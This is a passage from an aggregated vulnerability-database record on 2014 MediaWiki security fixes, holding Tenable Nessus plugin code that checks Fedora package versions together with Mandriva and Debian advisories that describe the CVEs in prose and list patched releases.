to appear blank or with missing\n text.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132655.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70094248\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mediawiki-1.21.9-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:03:58", "description": "- (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34 that caused pages to appear blank or with missing text.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-06T00:00:00", "type": "nessus", "title": "Fedora 19 : mediawiki-1.21.9-1.fc19 (2014-5691)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-2853"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mediawiki", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-5691.NASL", "href": "https://www.tenable.com/plugins/nessus/73875", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5691.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73875);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(67068);\n script_xref(name:\"FEDORA\", value:\"2014-5691\");\n\n script_name(english:\"Fedora 19 : mediawiki-1.21.9-1.fc19 (2014-5691)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - (bug 63251) (CVE-2014-2853) SECURITY: Escape sortKey in\n pageInfo.\n\n - (bug 58640) Fixed a compatibility issue with PCRE 8.34\n that caused pages to appear blank or with missing\n text.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-May/132602.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a6d8dee4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mediawiki package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mediawiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mediawiki-1.21.9-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mediawiki\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:057\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : mediawiki\r\n Date : March 13, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated mediawiki packages fix multiple vulnerabilities:\r\n \r\n MediaWiki user Michael M reported that the fix for CVE-2013-4568\r\n allowed insertion of escaped CSS values which could pass the CSS\r\n validation checks, resulting in XSS (CVE-2013-6451).\r\n \r\n Chris from RationalWiki reported that SVG files could be uploaded\r\n that include external stylesheets, which could lead to XSS when an\r\n XSL was used to include JavaScript (CVE-2013-6452).\r\n \r\n During internal review, it was discovered that MediaWiki's SVG\r\n sanitization could be bypassed when the XML was considered invalid\r\n (CVE-2013-6453).\r\n \r\n During internal review, it was discovered that MediaWiki displayed some\r\n information about deleted pages in the log API, enhanced RecentChanges,\r\n and user watchlists (CVE-2013-6472).\r\n \r\n Netanel Rubin from Check Point discovered a remote code execution\r\n vulnerability in MediaWiki's thumbnail generation for DjVu\r\n files. Internal review also discovered similar logic in the PdfHandler\r\n extension, which could be exploited in a similar way (CVE-2014-1610).\r\n \r\n MediaWiki before 1.22.3 does not block unsafe namespaces, such as a\r\n W3C XHTML namespace, in uploaded SVG files. Some client software may\r\n use these namespaces in a way that results in XSS. This was fixed\r\n by disallowing uploading SVG files using non-whitelisted namespaces\r\n (CVE-2014-2242).\r\n \r\n MediaWiki before 1.22.3 performs token comparison that may be\r\n vulnerable to timing attacks. This was fixed by making token\r\n comparison use constant time (CVE-2014-2243).\r\n \r\n MediaWiki before 1.22.3 could allow an attacker to perform XSS attacks,\r\n due to flaw with link handling in api.php. This was fixed such that\r\n it won't find links in the middle of api.php links (CVE-2014-2244).\r\n \r\n MediaWiki has been updated to version 1.22.3, which fixes these issues,\r\n as well as several others.\r\n \r\n Also, the mediawiki-ldapauthentication and mediawiki-math extensions\r\n have been updated to newer versions that are compatible with MediaWiki\r\n 1.22.\r\n \r\n Additionally, the mediawiki-graphviz extension has been obsoleted,\r\n due to the fact that it is unmaintained upstream and is vulnerable\r\n to cross-site scripting attacks.\r\n \r\n Note: if you were using the instances feature in these packages to\r\n support multiple wiki instances, this feature has now been removed.\r\n You will need to maintain separate wiki instances manually.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6451\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6452\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6453\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6472\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2242\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2243\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2244\r\n http://advisories.mageia.org/MGASA-2014-0113.html\r\n http://advisories.mageia.org/MGASA-2014-0124.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 0763c6b913556fd3d098e14e6711d4c9 mbs1/x86_64/mediawiki-1.22.3-1.mbs1.noarch.rpm\r\n 3f3d638b7a09dfc700a56f06a0e06629 mbs1/x86_64/mediawiki-ldapauthentication-2.0f-1.mbs1.noarch.rpm\r\n c1bdd7ff8e5ab29f74891cb4fa92bff0 mbs1/x86_64/mediawiki-mysql-1.22.3-1.mbs1.noarch.rpm\r\n 6cd761769b330e837612ed079816019f mbs1/x86_64/mediawiki-pgsql-1.22.3-1.mbs1.noarch.rpm\r\n e484574d3776723c87e46a832daf3c4a mbs1/x86_64/mediawiki-sqlite-1.22.3-1.mbs1.noarch.rpm \r\n 870886ea628aaac381b4ab4210e33ea0 mbs1/SRPMS/mediawiki-1.22.3-1.mbs1.src.rpm\r\n bfbd6cc7fb3ce82be5c01564c5bfddde mbs1/SRPMS/mediawiki-ldapauthentication-2.0f-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTIZKGmqjQ0CJFipgRAjIFAKCLVeGKatrjL2G/cYBZKCkekZ+BrgCdGfjO\r\naivXRBBXbumCTNMTeujkTrc=\r\n=5vFM\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-05T00:00:00", "title": "[ MDVSA-2014:057 ] mediawiki", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-2244", "CVE-2014-2242", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-4568", "CVE-2013-6472", "CVE-2014-2243", "CVE-2013-6452", "CVE-2013-6451"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30625", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30625", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:53", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3011-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nAugust 23, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mediawiki\r\nCVE ID : CVE-2014-5241 CVE-2014-5243\r\nDebian Bug : 752622 758510\r\n\r\nIt was discovered that MediaWiki, a website engine for collaborative\r\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\r\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243). The\r\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\r\nversion 1.19.18, which includes additional changes.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1:1.19.18+dfsg-0+deb7u1.\r\n\r\nFor the unstable distribution (sid), these problems will be fixed soon.\r\n\r\nWe recommend that you upgrade your mediawiki packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBCgAGBQJT+LEyAAoJEAVMuPMTQ89ERCAP/1LNJsl8+W5uJLY+bg2qWojz\r\nq/RhnhN4IUe3Koie9MS9Awc8j6C9MyGCqGiBxKPZwtPyxwLjwcj15zki5hV6Dbq+\r\nktbwqVEkmtb0kvGzm9XemkJQgtB5Uv4GWNju4uBAMLIzurxXSKyddgvHhhbRN7Y6\r\nWtZsBQGVvvofhuQs6jRtT30wQP1PIqmep/QFbMtZ7Fn7VUnof4a7CAJ7dzm3Lufj\r\nKbN1tgtFH2MHqPnazl/zzWAFIg2Bzqc1qLvuSwczRM56lUJ+34TT4EKXI7XmGUDN\r\njLUN2PIz3GabSVWCF6Q/yegh+26FI4S6Uf/ZETLOm+crYhfn86jl0XeTayCfbunq\r\n4ztzm3/CDZtVAaJGJANae+Fp63YavfyE7CVPE+wx94YCBAfEvDDuT8ZReYq/OrdE\r\niLbsFn5OEwxhuCL1RfOc9pkbTkskh2WigW9G7zDQ8e1PhgkO/KaY/wDsYREOmJfU\r\nuxBtkNpT22jbZegQJmsNzcnWKTh9u0tZMX+Z1f0vwmEFOpwVkNCGt+1A7znhAhkX\r\nNyEbEM3Mcvx/oF/6oa8aPfo2+I40YdFTnex/UMq9Bz4I1dOMoe2HXBz4smhulbbV\r\n/cG2ftlEFZE3g0cT2OdQZAE2Izs70xoL+BiL+kNhqAoFGO9gVY3z4lLLFDr3u82j\r\njFvHc+YgOGrQBMJSy90g\r\n=neUj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-08-26T00:00:00", "title": "[SECURITY] [DSA 3011-1] mediawiki security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241"], "modified": "2014-08-26T00:00:00", "id": "SECURITYVULNS:DOC:31024", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31024", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:50:21", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-05-05T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-6233", "CVE-2013-6231", "CVE-2014-2655", "CVE-2013-6429", "CVE-2012-2983", "CVE-2014-1879", "CVE-2014-1888", "CVE-2014-0053", "CVE-2014-2244", "CVE-2014-1206", "CVE-2014-1454", "CVE-2013-4152", "CVE-2014-2685", "CVE-2014-1216", "CVE-2014-2327", "CVE-2014-1224", "CVE-2014-2570", "CVE-2014-0097", "CVE-2014-2279", "CVE-2014-2332", "CVE-2014-1695", "CVE-2014-2280", "CVE-2014-2242", "CVE-2014-0054", "CVE-2012-2981", "CVE-2014-2330", "CVE-2014-2043", "CVE-2013-7106", "CVE-2012-2982", "CVE-2014-2682", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6234", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-5951", "CVE-2014-2243", "CVE-2012-4893", "CVE-2014-2035", "CVE-2014-2040", "CVE-2014-2331", "CVE-2013-7196", "CVE-2013-7195", "CVE-2013-6452", "CVE-2014-2531", "CVE-2014-2329", "CVE-2014-1471", "CVE-2014-2684", "CVE-2013-6232", "CVE-2014-2326", "CVE-2014-1904", "CVE-2013-6451", "CVE-2014-1455", "CVE-2014-2278", "CVE-2014-1223", "CVE-2014-1222", "CVE-2014-1889", "CVE-2014-1694", "CVE-2013-7108", "CVE-2014-2683", "CVE-2014-2328", "CVE-2014-2681"], "modified": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13733", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13733", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:50:18", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-08-26T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5025", "CVE-2014-5122", "CVE-2014-4722", "CVE-2014-2708", "CVE-2014-2327", "CVE-2014-0479", "CVE-2014-5243", "CVE-2014-0482", "CVE-2014-5241", "CVE-2014-5098", "CVE-2014-5339", "CVE-2014-0481", "CVE-2014-5097", "CVE-2014-3978", "CVE-2014-5262", "CVE-2014-5035", "CVE-2014-2709", "CVE-2014-5340", "CVE-2014-5026", "CVE-2014-5027", "CVE-2014-5261", "CVE-2014-5335", "CVE-2014-4002", "CVE-2014-2326", "CVE-2014-0480", "CVE-2014-5338", "CVE-2014-0483", "CVE-2014-3830", "CVE-2014-2328"], "modified": "2014-08-26T00:00:00", "id": "SECURITYVULNS:VULN:13930", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13930", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2021-10-21T23:14:43", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nIn the Mediawiki update issued as DSA 2891-1, a few files were missing\nfrom the package. This update corrects that problem. For reference, the\noriginal advisory text follows.\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-03-31T17:07:21", "type": "debian", "title": "[SECURITY] [DSA 2891-2] mediawiki regression update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-03-31T17:07:21", "id": "DEBIAN:DSA-2891-2:4C744", "href": "https://lists.debian.org/debian-security-announce/2014/msg00065.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T23:14:46", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 30, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610\nDebian Bug : 729629 706601 742857 742857\n\nSeveral vulnerabilities were discovered in MediaWiki, a wiki engine.\nThe Common Vulnerabilities and Exposures project describers the followin\nissues:\n\nCVE-2013-2031\n\n Cross-site scripting attack via valid UTF-7 encoded sequences\n in a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\n\n Kevin Israel (Wikipedia user PleaseStand) reported two ways\n to inject Javascript due to an incomplete blacklist in the\n CSS sanitizer function.\n\nCVE-2013-4572\n\n MediaWiki and the CentralNotice extension were incorrectly setting\n cache headers when a user was autocreated, causing the user's\n session cookies to be cached, and returned to other users.\n\nCVE-2013-6452\n\n Chris from RationalWiki reported that SVG files could be\n uploaded that include external stylesheets, which could lead to\n XSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\n\n MediaWiki's SVG sanitization could be bypassed when the XML was\n considered invalid.\n\nCVE-2013-6454\n\n MediaWiki's CSS sanitization did not filter -o-link attributes,\n which could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\n\n MediaWiki displayed some information about deleted pages in\n the log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\n\n A remote code execution vulnerability existed if file upload\n support for DjVu (natively handled) or PDF files (in\n combination with the PdfHandler extension) was enabled.\n Neither file type is enabled by default in MediaWiki.\n\n(ID assignment pending)\n\n Cross site request forgery in login form: an attacker could login\n a victim as the attacker.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.19.14+dfsg-0+deb7u1 of the mediawiki package and 3.5~deb7u1\nof the mediawiki-extensions package.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:1.19.14+dfsg-1 of the mediawiki package and 3.5 of the\nmediawiki-extensions package.\n\nWe recommend that you upgrade your mediawiki packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-03-30T09:25:39", "type": "debian", "title": "[SECURITY] [DSA 2891-1] mediawiki security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2031", "CVE-2013-4567", "CVE-2013-4568", "CVE-2013-4572", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-03-30T09:25:39", "id": "DEBIAN:DSA-2891-1:05758", "href": "https://lists.debian.org/debian-security-announce/2014/msg00064.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-21T23:14:26", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2891-3 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMarch 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mediawiki, mediawiki-extensions\nCVE ID : CVE-2013-2031 CVE-2013-4567 CVE-2013-4568 CVE-2013-4572 \n CVE-2013-6452 CVE-2013-6453 CVE-2013-6454 CVE-2013-6472\n CVE-2014-1610 CVE-2014-2665\nDebian Bug : 729629 706601 742857 742857\n\nThe Mediawiki 